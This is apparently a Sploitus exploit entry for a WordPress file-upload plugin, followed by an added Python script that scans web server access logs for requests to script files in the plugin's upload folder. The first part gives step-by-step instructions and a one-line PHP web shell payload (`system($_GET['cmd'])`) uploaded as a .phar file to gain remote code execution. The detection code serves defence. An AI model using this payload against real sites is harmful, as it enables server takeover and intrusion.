## https://sploitus.com/exploit?id=WPEX-ID:6AD99725-ECCC-4B61-BCE2-668B62619DEB
1) Go to the plugin's main dashboard: http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload a file with the extension "phar" and malicious code inside, like `<?php system($_GET['cmd']); ?>`
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) to get RCE
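
The request in step 4 leaves a recognizable trace in web server access logs: a script-type file fetched from the plugin's upload directory. The Python below is an added example for log review, not part of the original write-up or the plugin's code; it assumes Combined Log Format, and the extension list and sample log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions a server may be configured to hand to PHP (assumed list; match it
# to the handler mappings actually in use).
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "pht", "phtml", "phar", "phps"}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Upload location named in the steps above: uploads/filr/{number_of_post}/<file>
FILR_RE = re.compile(r"/wp-content/uploads/filr/(?P<post>\d+)/(?P<name>[^/]+)$", re.I)


def find_filr_script_hits(lines):
    """Return one dict per request for a PHP-executable file under uploads/filr/."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        f = FILR_RE.search(unquote(parts.path))
        if not f:
            continue
        # Look at every suffix: Apache's mod_mime can act on any extension
        # in a multi-extension name, not only the last one.
        exts = {e.lower() for e in f["name"].split(".")[1:]}
        if exts & PHP_EXTS:
            hits.append({"ip": m["ip"], "post": int(f["post"]), "file": f["name"],
                         "status": int(m["status"]), "has_query": bool(parts.query)})
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wordpress/wp-content/uploads/filr/12/cmd.phar?cmd=id HTTP/1.1" 200 54 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jan/2024:10:00:05 +0000] "GET /wordpress/wp-content/uploads/filr/9/report.pdf HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET /wordpress/wp-content/uploads/filr/12/CMD.PHAR HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jan/2024:10:00:12 +0000] "GET /wordpress/wp-content/uploads/2024/01/photo.jpg HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_filr_script_hits(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and a query string deserves priority; the same extension set can be used to audit the files already present under `wp-content/uploads/filr/`.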